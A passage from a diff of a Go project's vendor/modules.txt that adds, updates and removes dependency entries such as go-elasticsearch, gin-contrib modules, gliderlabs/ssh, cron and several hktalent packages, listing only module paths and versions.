github.com/dsnet/compress/internal/errors github.com/dsnet/compress/internal/prefix +# github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91 +## explicit; go 1.16 # github.com/dustin/go-humanize v1.0.0 ## explicit github.com/dustin/go-humanize +# github.com/elastic/go-elasticsearch/v7 v7.17.1 +## explicit; go 1.11 +github.com/elastic/go-elasticsearch/v7 +github.com/elastic/go-elasticsearch/v7/esapi +github.com/elastic/go-elasticsearch/v7/estransport +github.com/elastic/go-elasticsearch/v7/internal/version # github.com/emersion/go-message v0.16.0 ## explicit; go 1.14 github.com/emersion/go-message 
@@ -358,9 +374,13 @@ github.com/getsentry/sentry-go github.com/getsentry/sentry-go/internal/crypto/randutil github.com/getsentry/sentry-go/internal/debug github.com/getsentry/sentry-go/internal/ratelimit +# github.com/gin-contrib/gzip v0.0.5 +## explicit; go 1.13 # github.com/gin-contrib/sse v0.1.0 ## explicit; go 1.12 github.com/gin-contrib/sse +# github.com/gin-contrib/static v0.0.1 +## explicit; go 1.15 # github.com/gin-gonic/gin v1.8.1 ## explicit; go 1.18 github.com/gin-gonic/gin @@ -368,6 +388,8 @@ github.com/gin-gonic/gin/binding github.com/gin-gonic/gin/internal/bytesconv github.com/gin-gonic/gin/internal/json github.com/gin-gonic/gin/render +# github.com/gliderlabs/ssh v0.3.4 +## explicit; go 1.12 # github.com/go-ole/go-ole v1.2.6 ## explicit; go 1.12 github.com/go-ole/go-ole @@ -573,17 +595,21 @@ github.com/hbakhtiyor/strsim # github.com/hdm/jarm-go v0.0.7 ## explicit; go 1.15 github.com/hdm/jarm-go -# github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668 +# github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66 ## explicit; go 1.18 github.com/hktalent/PipelineHttp # github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d ## explicit; go 1.18 github.com/hktalent/go-utils -# github.com/hktalent/goSqlite_gorm v1.1.3 +# github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9 +## explicit; go 1.17 +# github.com/hktalent/goSqlite_gorm v1.1.4 ## explicit; go 1.18 github.com/hktalent/goSqlite_gorm/lib github.com/hktalent/goSqlite_gorm/lib/scan/Const +github.com/hktalent/goSqlite_gorm/pkg/es7 github.com/hktalent/goSqlite_gorm/pkg/models +github.com/hktalent/goSqlite_gorm/pkg/util # github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267 ## explicit; go 1.18 github.com/hktalent/jarm-go 
@@ -664,8 +690,6 @@ github.com/jcmturner/gokrb5/v8/types ## explicit; go 1.13 github.com/jcmturner/rpc/v2/mstypes github.com/jcmturner/rpc/v2/ndr -# github.com/jinzhu/copier v0.3.5 -## explicit; go 1.13 # github.com/jinzhu/inflection v1.0.0 ## explicit github.com/jinzhu/inflection @@ -765,6 +789,8 @@ github.com/mailru/easyjson github.com/mailru/easyjson/buffer github.com/mailru/easyjson/jlexer github.com/mailru/easyjson/jwriter +# github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227 +## explicit # github.com/marten-seemann/qpack v0.2.1 ## explicit; go 1.14 github.com/marten-seemann/qpack @@ -1177,6 +1203,8 @@ github.com/remeh/sizedwaitgroup # github.com/rivo/uniseg v0.4.2 ## explicit; go 1.18 github.com/rivo/uniseg +# github.com/robfig/cron v1.2.0 +## explicit # github.com/rogpeppe/go-internal v1.9.0 ## explicit; go 1.17 github.com/rogpeppe/go-internal/fmtsort @@ -1323,6 +1351,8 @@ github.com/ulikunitz/xz/lzma # github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 ## explicit; go 1.14 github.com/ulule/deepcopier +# github.com/unrolled/secure v1.10.0 +## explicit; go 1.13 # github.com/urfave/cli/v2 v2.16.3 ## explicit; go 1.18 github.com/urfave/cli/v2